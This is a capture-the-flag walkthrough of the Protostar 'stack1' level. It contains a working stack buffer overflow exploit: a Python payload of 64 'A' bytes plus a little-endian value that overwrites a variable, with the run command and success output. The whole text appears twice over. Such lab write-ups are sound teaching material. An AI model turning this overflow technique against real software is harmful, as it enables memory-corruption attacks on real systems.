Protostar 0x01 - Stack1
Prev: 0x00 - Stack0
Next: 0x02 - Stack2
When we check the source code for this level, we notice that it's very similar to the previous level, but with two differences: first, our input is passed as an argument rather than input requested via "gets," and second, rather than simply change the "modified" variable we must overwrite it with "0x61626364."
You may recognize the ASCII equivalents of those hex values and be inclined to pass them in as letters, but we will pass them in as hex. To do this, we will build a Python file using the Nano text editor, which is very lightweight. First, however, we'll want to move to the /tmp folder where we have more permissions, and bring a copy of "stack1" with us. Then, enter "nano stack1.py" to create a new file and open with Nano.
$ cp stack1 /tmp
$ cd /tmp
$ ls
stack1
$ nano stack1.py
We'll begin by importing the "struct" package, which will allow us to pack the requested bytes in little-endian format. This may seem like overkill for just these four bytes, but it is package that will help us more later on.
Next, we'll create our buffer of 64 "A" bytes. Then, we'll use "struct.pack" to properly organize the requested bytes. The "<" character will be used in the format argument to designate little-endian, followed by "I" to indicate the data type is unsigned int. Finally, we'll concatenate the buffer and the requested bytes, and print.
import struct
buffer = "A" * 64
modified = struct.pack("<I", 0x61626364)
payload = buffer + modified
print payload
Let's test this before passing into the program:
$ python stack1.py
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba
Great! We've got our 64 A's followed by the ASCII representation of the requested bytes in little-endian: 0x61 is "a," 0x62 is "b," etc. We just need to pass it into the stack1 program to confirm we've completed the objective.
$ ./stack1 `python stack1.py`
you have correctly got the variable to the right value
Prev: 0x00 - Stack0
Next: 0x02 - Stack2
Next: 0x02 - Stack2
When we check the source code for this level, we notice that it's very similar to the previous level, but with two differences: first, our input is passed as an argument rather than input requested via "gets," and second, rather than simply change the "modified" variable we must overwrite it with "0x61626364."
You may recognize the ASCII equivalents of those hex values and be inclined to pass them in as letters, but we will pass them in as hex. To do this, we will build a Python file using the Nano text editor, which is very lightweight. First, however, we'll want to move to the /tmp folder where we have more permissions, and bring a copy of "stack1" with us. Then, enter "nano stack1.py" to create a new file and open with Nano.
$ cp stack1 /tmp
$ cd /tmp
$ ls
stack1
$ nano stack1.py
We'll begin by importing the "struct" package, which will allow us to pack the requested bytes in little-endian format. This may seem like overkill for just these four bytes, but it is package that will help us more later on.
Next, we'll create our buffer of 64 "A" bytes. Then, we'll use "struct.pack" to properly organize the requested bytes. The "<" character will be used in the format argument to designate little-endian, followed by "I" to indicate the data type is unsigned int. Finally, we'll concatenate the buffer and the requested bytes, and print.
import struct
buffer = "A" * 64
modified = struct.pack("<I", 0x61626364)
payload = buffer + modified
print payload
Let's test this before passing into the program:
$ python stack1.py
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba
Great! We've got our 64 A's followed by the ASCII representation of the requested bytes in little-endian: 0x61 is "a," 0x62 is "b," etc. We just need to pass it into the stack1 program to confirm we've completed the objective.
$ ./stack1 `python stack1.py`
you have correctly got the variable to the right value
Prev: 0x00 - Stack0
Next: 0x02 - Stack2